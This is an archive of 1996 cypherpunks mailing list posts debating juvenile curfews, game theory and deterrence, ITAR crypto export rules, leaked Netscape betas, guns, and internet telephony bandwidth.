Content-Type: text/plain


At 6:37 PM 7/20/96, Alan Olsen wrote:

>I bet the "National Curfew" crap that Clinton is trying to push is not going
>down well either.  He seems to think that the problems of a small fraction
>of the country apply to the whole country...  (But it makes for good sound
>bites.)

Yes, I have written about the local "curfew" in my local newsgroup
(scruz.general), and I forwarded at least one of these articles to this
list, as you may recall.

Consistent with my views on gun control, mandatory doping of children, the
outlawing of certain dietary items, and on and on, I would be mighty pissed
if a kid of mine was picked up the cops and hauled off to a processing
center for eventual disposition for the thought crime of being on the
street without an excuse acceptable to the local gendarmes.

(In fact, I think I'd be tempted to just not answer any phone calls from
the reeducation center staffers; getting through to me on the phone can
often be difficult, of course, and I doubt they know about e-mail.)

I told someone in scruz.general who argued strongly for the need for
curfews on kids that her points had convinced me, that I now understood her
position, that I now agreed with it, and that I would be doing my part by
making a citizen's arrest of any curfew violators I found in my
area...especially cute 16-year-old girls. (I never heard from her
again...after she stopped foaming at the mouth she probably contacted the
Thought Crimes Task Force of the Sheriff's Department.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 21 Jul 1996 07:27:10 +0800
To: cypherpunks@toad.com
Subject: Game Theory and its Relevance to Cypherpunks
Message-ID: <ae168dd4030210043a7a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Game theory is terribly important to Cypherpunks.

At 8:11 PM 7/20/96, Perry E. Metzger wrote:
>Arun Mehta writes:
>> >It may sound "stupid" to you...I suggest you read up on evolutionary game
>> >theory. Sometimes one has no choice but to respond to an arms buildup.
>> >Unilateral disarmament rarely works.
>>
>> There are surely alternatives to the extremes of unilateral
>> disarmament and an arms race? For instance, slowing down  the
>> race?
>
>Don't ask the question as though it is theoretical. Don't try
>answering it as though your personal values have any bearing, because
>there is indeed an objective answer here. Try doing some game theory
>simulations and see how well unilateral disarmament works.
>
>Oh, and don't give us stuff about how humans are above evolutionary
>pressures or nonsense like that, because we aren't any more above such
>pressures than we are above the laws of physics.


Moreover, folks should pay careful attention to the way the _appearance_ of
strength is critical. I don't mean bluffing, thought that sometimes has a
place, I mean the "scaring off" of would-be
challengers/attackers/intruders.

For example, one well-known variant in evolutionary game theory is the
"game of chicken," immortalized in the race-to-the-cliff in "Rebel Without
a Clue^H^H^H^H^HCause." While such games sound foolish to many--and such a
cliff race is not something I'd ever partake in--they are quite common and
confer evolutionary advantages to the winners.

To put it simply, the leader of a pack, whether dogs, humans, whatever, may
face challenges from other pack members. If he can convince them that he'll
win, that he's the craziest motherfucker on the planet, the challenges are
reduced. A weak-appearing leader is of course attacked more quickly. (These
are separate issues from the actual strength of skill of the participants,
but it's a basic fact that a leader who can avoid as many challenges as
possible will likely last longer.)

Seen another way, there is considerable game-theoretic advantage in being
seen as "crazy." If the other guy veers off long before impact or going
over the cliff, because he think his opponent is crazy enough to ignore
"rationality," much is gained by the victor.

Avoiding fighting is often the most important consideration, and arms races
often accomplish this goal! Even the "MAD" policy of "mutually assured
destruction" has game-theoretic justification. (Indeed, this is virtually a
truism, given the role game theory and the RAND Corporation played in the
devising of the MAD strategy.) While humanists and liberals may cluck at
the admittedly horrible consequences of MAD, were it ever implemented, it
is solidly grounded in these "games." Fortunately, the goal of MAD was to
not have to be used, and it appears now to have worked quite well (albeit
at high cost).

The application of these ideas to gun ownership is pretty clear, even to
those who have not studied or thought much about these topics: a person
contemplating a crime will be more likely to do so with an unarmed person.
Duh. And less likely against someone he suspects is armed. Still less
likely againt a "gun nut." Seeing an "NRA" sticker in the window of a car
parked outside is likely to make him think twice, fearing a "gun nut" is
inside. Being perceived as a gun nut does have some advantages. Hence the
availabilty of signs saying: "Trespassers will be Shot," and, my favorite:
"I have a .45 and a shovel; I doubt you'll be missed." (5 points to
whomever first identifies the movie this was in)

(One of the interesting speculations is what role this thinking played in
the development of U.S. paramilitary S.W.A.T. teams, the "black-clad
ninjas" we have been talking about recently. Creating a terrifying image,
an image of crazed indifference, is a useful thing. Certainly the S.S.
understood the power of their frightening uniforms and the "myth" of their
bloodthirstiness. (Note: I am not saying their bloodthirstiness was a myth,
but that they deliberately cultivated this image. Intimidation works,
game-theoretically.)

Game theory is at the confluence of economics (costs), psychology
(motivations, rewards), evolution (who survives to reproduce), sociobiology
(essentially another name for evolutionary game theory), and other fields.
All educated persons should know the basics of a bunch of related things:

-- "the prisoner's dilemma" (another famous example)

-- the iterated forms of this and other games

-- the concept of payoff matrices

-- the game of chicken

-- the nature of arms races

-- random reinforcement

-- the concept of "defection"

-- the ideas of positive-, zero-, and negative-sum games.

More advanced stuff, e.g, Nash equilibria, is real useful to know about,
but is not part of any ordinary conversations I have seen on the Net in
many years of participating.

In particular, game theory has a lot of usefullness to crypto and
Cypherpunk themes. "All security is economics." Lots of obvious
connections. Most Alice-Bob situations are essentially multi-party games,
with all the related stuff about spoofing, expectations, reputations,
cheating, etc. (Granted, many of these situations are far beyond the formal
games that have been analyzed in detail to date. That is, it is not clear
how crytpographic protocols affect such games; or at least this is a
fertile area for further study.)

A good understanding of game theory can be gotten in a few weeks by reading
some of the main introductory texts. This will not qualify oneself as an
expert, but will provide one with insight into why many of us make the
points we make about economics, self-reliance, payoff outcomes, and so on.

Useful sources:

Axelrod, "The Evolution of Cooperation" --> the best place to start, IMO

Hofstadter, various chapters in "Metamagical Themas"

Poundstone, "The Prisoner's Dilemma"

Kahn, "On Thermonuclear War"

And of course various textbooks on game theory. (But read the popular
accounts first, else the mathematical rigor will be meaningless and
confusing.)

The usefullness to cryptography, especially to the more outre stuff we are
most interested in, has largely remained unexplored. I get the impression
that few academic cryptographers know much about it. I predict that
important insights will come as these fields come into more contact.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 21 Jul 1996 13:13:18 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
In-Reply-To: <31F15D42.1CFB@netscape.com>
Message-ID: <Pine.LNX.3.94.960720230708.401B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 20 Jul 1996, Tom Weinstein wrote:

> Why not consider what the consequences will be?  Do you seriously
> believe that this will make the government stop enforcing ITAR?

The government has yet to enforce ITAR.  The only thing they have been doing
is threatening companies who make products with strong crypto.  If anyone was
ever actually put on trial for a violation of ITAR, it would almost certainly
be found to be unconstitutional.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfGfu7Zc+sv5siulAQGCCgP+JApL6HQ31ZbG2j/FDmc7LJMjszd6ZcA1
GZDWMzPbI+JNt4zooUsYR9uJoNWz3NppdtRc7y6jp6etddTq+le99EDexujc2DSn
s3rq0NSaK0VwZIee0GWhaWahw+URxDNU4A5gWsd/oz3UhVA9R/ltIwtwwE2ctxgi
Iv9M/1Ftuoc=
=rCQr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 21 Jul 1996 13:38:26 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] was Re: Giving 6 year old kids [guns]
Message-ID: <199607210332.XAA60290@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

After a conversation with a well-respected cypherpunk in private email,
I have been convinced to reveal publicly that at age 6 [first grade] I
had access to a .22 semiautomatic rifle and a 12GA shotgun, with good
safety instruction and accuracy in each (though the 12GA's kick took a
bit of getting-used-to). I was instructed to shoot any burglar, and I
feel lucky that we never had any. The thought of taking these (or any!)
guns to school _never_ entered my mind. I drove a car (on private land)
when I was only a bit older. There are certain 6 year olds who are quite
capable of taking proper responsibility with firearms, and there are also
certain 26 year olds who probably should reconsider gun ownership.
That's life. The reason I posted this non-cryptography stuff (sorry,
Perry!) here is that many non-US citizens may not understand the strong
"gun culture," (which is actually more a gun-safety culture, IMO) in
this country. Gun-grabber-hypocrites like syndicated columnist Carl
Rowan are provably the *least* safe gun owners, and the evidence also
proves beyond any doubt the good old bumper-sticker saying:
"Ted Kennedy's car has killed more people than my gun."
[Any replies to private e-mail, please.]
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"It is long past time to end the laughable presumption that voters
 who can easily cope with the choices offered at Burger King are
 somehow 'confused' by more than two choices at the voting booth."
 -- me, in the Miami Herald, June 24, 1996, p. 10A.

 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMfGbIm1lp8bpvW01AQG0fgP+LWV9lprYEWahaIhsyLHvMSnc6fjbpDF+
eeTac9Wb1+j78KzT8zxpmnw7I5/nuVZqJRFkZCSjKIclWf2/uzxbi+vRLwf7HWgn
iIrnZgv3ozmYZUfCoYx31PbpjT0JYUTxsDvPO+TGwQYuLeYwBH865V3JAXGc7FDO
KFB49zbWvnE=
=GHZ8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jul 1996 16:38:18 +0800
To: Remo Pini <cypherpunks@toad.com
Subject: RE: ABC news on Internet Telephony
Message-ID: <199607210632.XAA16792@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 AM 7/21/96 +0200, Remo Pini wrote:

>>A single central office has many times the bandwidth of the widest
>>part of the internet, and the average state has hundreds of CO's.
>>If even a small portion of the Internets current users tried
>>placing a call things would grind to a halt. A huge increase in the
>>number of backbones and their bandwidth would solve this, but who
>>will pay the bill? 
>
>I guess Internet-telephony is one of the bandwidth killers.

Potentially.  However, there has been some mention of a new standard for 
voice compression that puts voice into 2400 bits per second, a factor of 
about 25 lower than the phone company normally uses. (They use 8,000 samples 
per second at 8 bits per sample, companded.)  At that rate, a pair of 
modern, 2.4 Gb/s fibers could handle 1 million simultaneous phone calls.  
Since some of the newer fiber systems put 8 or more separate channels down a 
single fiber, that would work out to 8 million conversations.

I have to conclude that we shouldn't even be close to running out of 
Internet capacity, _IF_ it were driven by state-of-the-art fiber and 
similar-speed switches.  But it probably isn't.  At best, Internet probably 
only gets a fraction of the capacity of a given fiber wherever it flows.  
This will have to change.


>>TANSTAAFL
>>
>>Sometime ago the discussion was on the cost of laying new fiber,
>>may I suggest  the realworld heuristic of "a million dollars a
>>mile."
>
>There are of course a lot of alternatives:

In most cases, "new fiber" isn't needed, and will probably only be rarely 
needed on long-distance links.  As I understand it, most cableways are laid 
with extra tubes, into which new fiber cables can be blown in (using 
compressed air) long after the trench is filled.  The specific example I 
saw, there were three 2" diameter tubes in a larger tube, and according to 
the contractor (I asked...) only one of the tubes would be filled at that 
time.  In addition, while he wasn't sure, he thought that at least some of 
the 36-fiber cable in that one tube would remain "dark," or unused until it 
was later needed.

I don't know how expensive it is to add that extra fiber cable into an 
existing tube, but it would be VASTLY cheaper than the original trenching 
operation.  Further, much of the improved transmission technology can be 
used on the older fibers to increase their capacity:  A fiber now used to 
transmit a single 2.4 gigabit signal can be upgraded, simply using new 
channelized transmitters and receivers to increase the data rate to 8 or 16 
times the previous rate.






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 21 Jul 1996 16:41:12 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
In-Reply-To: <Pine.LNX.3.94.960720230708.401B-100000@gak>
Message-ID: <Pine.GUL.3.94.960720233212.873A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 20 Jul 1996, Mark M. wrote:
> On Sat, 20 Jul 1996, Tom Weinstein wrote:
> 
> > Why not consider what the consequences will be?  Do you seriously
> > believe that this will make the government stop enforcing ITAR?
> 
> The government has yet to enforce ITAR.  The only thing they have been doing
> is threatening companies who make products with strong crypto.  If anyone was
> ever actually put on trial for a violation of ITAR, it would almost certainly
> be found to be unconstitutional.

So do it. None of this anonymous bullshit, or trying to drag Netscape into
it. 

I'd donate whatever I could to a Cypherpunk Legal Defense Fund. We only need
one volunteer with a lot of time on his/her hands. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfHPwpNcNyVVy0jxAQEckQH/UfScMaluCISTxIQeFEGysHlJ0bdEirJS
XVnuXDA/CPlD7TtCHBOUCcoCn/bCq5rMngLkbtKvDMHCgpRiADTpuA==
=BWaW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 21 Jul 1996 15:07:12 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607202231.RAA09968@manifold.algebra.com>
Message-ID: <acDeRD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> JonWienk@ix.netcom.com wrote:
> >
> > P.S. Chesnokov = Chudov = Vulis = Sternlight = Detweiler
> >
>
> That's an interesting equation.

Am I talking to myself? I'm definitely not talking to SternFUD.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jt@freenix.fr (Jerome Thorel)
Date: Sun, 21 Jul 1996 07:57:11 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: lambda 2.09 - French Telco Act Censored?
Message-ID: <v01510102ae170f39d717@[194.51.82.138]>
MIME-Version: 1.0
Content-Type: text/plain


>At 09:41 PM 7/19/96 +0100, Jerome Thorel wrote:
>
>>OECD FAILS TO ACT ON KEY-ESCROW ENCRYPTION; THE US ACCUSED OF "POLICY
>>LAUNDERING"
[deleted]

Jim Bell
jimbell@pacifier.com wrote:

>Lemme see...  The Europeans are now complaining about the US government
>pushing key escrow on them?  So where did that "emerging consensus" go?!?

That was not a complaint -- but a modest report <g>. Anyway, the major
countries which are to complaint about the US pressure are Japanese,
Australians, and Scandinavian countries, which are less keen to let
intelligence agencies controling individuals or industry secrets. France
and the UK, however, are sitting side by side with the US.

But I can add that my source is from the US :-) And that US business
circles around OECD discussions think no international guidelines could
emerge after any OECD meeting.


Jerome Thorel ==-== Journaliste / Free-lance Reporter ==-== Paris, France
        ==-== ID Press Card +++ Carte de Presse No 72052 ==-==






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 21 Jul 1996 13:52:29 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: pledge status
In-Reply-To: <v03007611ae16c9abab05@[192.187.162.15]>
Message-ID: <Pine.SV4.3.91.960720234227.27174C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


One recalls the Russian novelist (can't think of his name, the one who 
wrote _Day in the Life of Ivan Denisovitch_), who stated that if even 1% 
of all of the Cheka/KGB's arrest-in-the-middle-of-the-night victims had 
put up some resistance, and maybe have killed a Chekist before being 
gunned down..... the whole damn system of Stalinist terror would have 
unraveled, from the lack of police willingness to die for the greater 
glory of Mr Stalin.

I think this has
 relevance to the
black-ninjas-pretending-that-they're-in-a-Hollywood-script thread about
cops making unanounced search warrant services at 4am. 

I have tremendous admiration for my local LEO's.  It's the federales that 
are the problem, usually.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 21 Jul 1996 14:00:44 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <1.5.4.32.19960720185045.0031750c@giasdl01.vsnl.net.in>
Message-ID: <Pine.SV4.3.91.960720235551.27174D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> race? More often than not, it is the US that has upped the ante.
> They consistently had more nuclear warheads than the Soviet
> Union, new technologies that disrupted the status quo came
> generally from the West.


   The USA practiced the WWII german approach.... high technology to make 
up for smaller resource base.

The USSR practiced the WWII approach of the Allies.... drown the opponent 
in your production capacity of basic killing machines.

If you are trying to make us believe that the USSR had smaller arsenals 
and lesser numbers of soliers manning the front lines, you are going to 
have to take your proposition to one of those "progressive" forums where 
historical fact is not permitted to get in the way of a good work of 
ideological fiction.

You're two generations too late, old lad..... You should have been a 
writer of encyclopedia articles for the Stalin regime.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 21 Jul 1996 17:12:06 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
Message-ID: <199607210701.AAA00292@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight (david@SternBot.com) writes:

 > There are many others who have come to similar conclusions
 > about the formation of independent judgement in children,
 > and lots of non-Piaget experiments. Your comments are
 > diversionary and in fact by the end of your post you come to
 > agree with my basic point.

Every doctrine has its followers, and I will admit "Piaget-Speak"
is still quite popular in certain circles, and its buzzwords are
often heard in arguments promoting child inferiority and
dismissing childrens' concerns.

That hardly means I agree with your basic point, which is that
parents should be able to do whatever they want in controlling
their childrens' information sources without their children
having any recourse against them.

 > That is also false in its implications. Librarians are in
 > loco parentis,

This, of course, varies with local statutes, as does the legal
definition of "In Loco Parentis." Generally it applies to
teachers, people hired to care for children, and some relatives,
such as grandparents.  I am not familar with any locale where
librarians are specifically mentioned, and most librarians will
be more than happy to explain to you that a library is not a free
babysitting service, and that they are not caregivers.

 > and most libraries are VERY careful about what materials
 > young children are exposed to and what is more, are
 > responsive to community pressure in the matter since most
 > libraries are community-based.

Most libraries let "young adults" (read anyone who has hit their
teenage years) read pretty much anything they want.  "Parents on
the warpath" have managed to apply pressure in recent years, and
libraries are a bit less free than they used to be, but I think
the American Library Association has done a pretty good job in
standing its ground against agitators and pressure groups.

 > So after trying to refute my point, you come to agree with
 > it and want to shift the issue to the question of at what
 > age....

No - I stated in my original message that young children do need
some reasonable constraints to guard them from exposure to
material which might cause them emotional pain.

This is far different from your assertion that minors (everyone
under 18) should have no access to any information that their
parents do not pre-approve.

 > I'm not competent to assess that nor, I assert, are you; I
 > suggest it varies with the child and it's up to the
 > individual parent to make those subtle distinctions, issue
 > by issue, child by child.

Nothing subtle about it David.  Once young people have passed
through early childhood, the burden of proof is on anyone who
suggests that they should be insulated from social and political
reality to provide a convincing reason why. Parental
capriciousness doesn't qualify.

 > As I parse the above sentence it says limiting is often
 > justified but it might not be.

Parse the sentence again.  What it says is that although
"protecting children" is often the excuse used to limit older
childrens' access to controversial material, the reality is that
it is usually an effort to control their thinking on certain
issues by making sure they have only one viewpoint, that of their
parents.

 > If so, it's up to the parents to figure ou where THEIR kid
 > is on the scale--nobody else has as much time, motivation,
 > or opportunity to observe.

As is usual with Statists, the argument is seen as a debate over
who should be doing the controlling, the notion that everyone
needs to be controlled being a foregone conclusion.

Perhaps it's time to take Perry's pledge. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sun, 21 Jul 1996 09:01:21 +0800
To: cypherpunks@toad.com
Subject: RE: ABC news on Internet Telephony
Message-ID: <1.5.4.32.19960720223758.0097ee74@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 01:54 PM 7/18/96 -0700, you wrote:

--- all the following points are based on swiss circumstances, they may not
apply to US ---

>point to point circuits are more efficiently handled by circuit
>switching rather than packet switching networks. Nicholas
>Negroponte wrote an interesting piece about asynchronous vs
>synchronous, I believe it is in his book "Being Digital." 

Well, from a users point of view, sending packet data over a packet mode
bearer service is more efficient (and cheaper). An interesting developement
in this direction is the PMBS-A/B modes of ISDN (packet switching to the
public switch). The existance of this service suggests its usability.

>ADSL is an interesting attempt at digital telephony but expensive
>and basically would mean replacing existing central office
>switches. (backbone bandwidth) 

We have a well developed DQDB-MAN and ATM net around, and bandwidth is
available (and getting cheaper by the minute). Currently, a onetime
investment of around $2500 per client is necessary to provide >5MBit/s
transfer volume (via the cable TV networks or the existing broadband networks)

>In a packet network you have to either dedicate a portion of the
>bandwidth for a synchronous circuit, or you have to have a very
>fast network and use very small packets (ATM), expensive either
>way.

Not if you have a dedicated packet switching network for asynchronous packet
transfer only. If you use it for both you don't have to have a very fast
network, you have to have a network with predictable and constant packet
delay. (that's not the same as fast!)

>A single central office has many times the bandwidth of the widest
>part of the internet, and the average state has hundreds of CO's.
>If even a small portion of the Internets current users tried
>placing a call things would grind to a halt. A huge increase in the
>number of backbones and their bandwidth would solve this, but who
>will pay the bill? 

I guess Internet-telephony is one of the bandwidth killers.

>TANSTAAFL
>
>Sometime ago the discussion was on the cost of laying new fiber,
>may I suggest  the realworld heuristic of "a million dollars a
>mile."

There are of course a lot of alternatives:
- Existing wiring (5 MBit/s over 6 copper wires is possible)
- Usage of the cable networks
- Radio transmissions (RITL - radio in the loop)
- Satellite transmissions

>Please note I am not trying to make fun of anyone personnally, I am
>in the words of Jubal Harshaw "heaping scorn upon an inexcuseably
>silly idea, a practice I shall always follow."

Neither am I, but isn't anyone?

----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
soon:PGP: http://www.rpini.com/remopini/rpcrypto.html
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sun, 21 Jul 1996 05:52:23 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <1.5.4.32.19960720185045.0031750c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 20/07/96 -0700, Timothy C. May wrote:

>By "you," I have to presume you mean "me." No, I am not at likely to use
>this weapon in a rage against a loved one. Trust me.

This was not intended to suggest how "you" might behave, I don't
know you that well, it would have been less confusing for me to
have used the pronoun "one."  


>It may sound "stupid" to you...I suggest you read up on evolutionary game
>theory. Sometimes one has no choice but to respond to an arms buildup.
>Unilateral disarmament rarely works.

There are surely alternatives to the extremes of unilateral
disarmament and an arms race? For instance, slowing down  the
race? More often than not, it is the US that has upped the ante.
They consistently had more nuclear warheads than the Soviet
Union, new technologies that disrupted the status quo came
generally from the West.
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Sun, 21 Jul 1996 18:29:24 +0800
To: "cypherpunks" <alanh@infi.net>
Subject: Re: pledge status
Message-ID: <199607210810.BAA06451@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 20 Jul 96 23:12:20 -0800, alanh@infi.net wrote:

>One recalls the Russian novelist (can't think of his name, the one who 
>wrote _Day in the Life of Ivan Denisovitch_), who stated that if even 1% 
Solzhenitsyn? (Spelling may be wrong) Very good, BTW.
>of all of the Cheka/KGB's arrest-in-the-middle-of-the-night victims had 
>put up some resistance, and maybe have killed a Chekist before being 
>gunned down..... the whole damn system of Stalinist terror would have 
>unraveled, from the lack of police willingness to die for the greater 
>glory of Mr Stalin.

>I think this has
> relevance to the
>black-ninjas-pretending-that-they're-in-a-Hollywood-script thread about
>cops making unanounced search warrant services at 4am. 
>
>I have tremendous admiration for my local LEO's.  It's the federales that 
>are the problem, usually.
I'm thinking of Waco, where, I've heard, more experienced SWAT-types
tried to talk their bosses out of a certain infamous mistake...

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Jul 1996 19:11:33 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
Message-ID: <199607210854.BAA01300@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:24 PM 7/19/96 -0700, Rich Graves <llurch@networking.stanford.edu> wrote:
>On Fri, 19 Jul 1996, Anonymous wrote:
>[on hacktic]
>> netscape-fts2-hp10.tar.gz	Fast Track Server 2.0 for HPUX10
>> netscape-fts2-nt.exe		Fast Track Server 2.0 for WinNT
>> netscape-hpus-30b5.tar.gz	Navigator 3.0b5 for HP-UX
>> netscape-linux-30b5.tar.gz	Navigator 3.0b5 for Linux
>> netscape-ssl30-src.tar.gz	SSL 3.0 source code
>> netscape32us-30b5.exe		Navigator 3.0b5 for Win95/NT
>
>And thus it begins... I think it's a bad idea to provoke the TLAs like this,
>but I suppose it's inevitable. (But doesn't anyone use Macs or Suns?)

Appears that they don't use Windows 3.1 16-bit versions either.
BTW, the executable is _huge_ - over 3MB, and that doesn't seem to
include all the plugins from previous versions.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Jul 1996 19:28:42 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Netscape
Message-ID: <199607210918.CAA01556@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 PM 7/20/96 -0400, "Mark M." <markm@voicenet.com> wrote:
>On Sat, 20 Jul 1996, Tom Weinstein wrote:
>> Why not consider what the consequences will be?  Do you seriously
>> believe that this will make the government stop enforcing ITAR?
>
>The government has yet to enforce ITAR.  The only thing they have been doing
>is threatening companies who make products with strong crypto.  If anyone was
>ever actually put on trial for a violation of ITAR, it would almost certainly
>be found to be unconstitutional.

First of all, the goverrnment _has_ enforced ITAR; I've seen references
(ummm, on the net...) to a few cases of things like exporting TV decryptors,
as well as all the enforcement about illegal trafficking in guns and such.

But second, if you're threatened with jail and large fines, and have
to pay your lawyers lots of money to avoid being railroaded,
that's enforcement even if it's not the full-scale due process type.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Jul 1996 19:48:05 +0800
To: cypherpunks@toad.com
Subject: Re: ITAR's 40 bit limit
Message-ID: <199607210918.CAA01561@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:45 PM 7/20/96 -0400, "David F. Ogren" <ogren@cris.com> wrote:
>Another paradox of the US export regulations.
>The NSA is allowing 40 bit crypto exports.  So as a hypothetical example 
>assume that I write a crypto program that uses 40 bit RC4 to encode data 
>(licensing from RSA).  I then get an export license using the accelerated 
>process for 40 bit RC4.
.......
>However, what if she runs the program three times with three different 
>passwords.  (Ignore the problems of Inner-CBC and Outer-CBC for now.)  Now 
>the file is triple RC4 encoded with the equivalent of 80 bit security.  

Not always possible.  The rule isn't just "40 bit crypto" it's "permission,
which you won't get with over 40 bits unless you're very cooperative."
Applications like Netscape's SSL don't give you the ability to feed your
data through it three times; they process your stream of data and send it.

Also, some 40-bit systems put known plaintext at the beginning of their
output (e.g. a magic number saying that this file is in FooBar40 format)
which means that even if you quintuply encrypt them, you still only
have several layers of 40-bit encryption that you can peel one at a time.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Tue, 23 Jul 1996 12:09:56 +0800
To: "cypherpunks" <ceridwyn@wolfenet.com>
Subject: Re: Opiated file systems
Message-ID: <199607221803.LAA03165@toad.com>
MIME-Version: 1.0
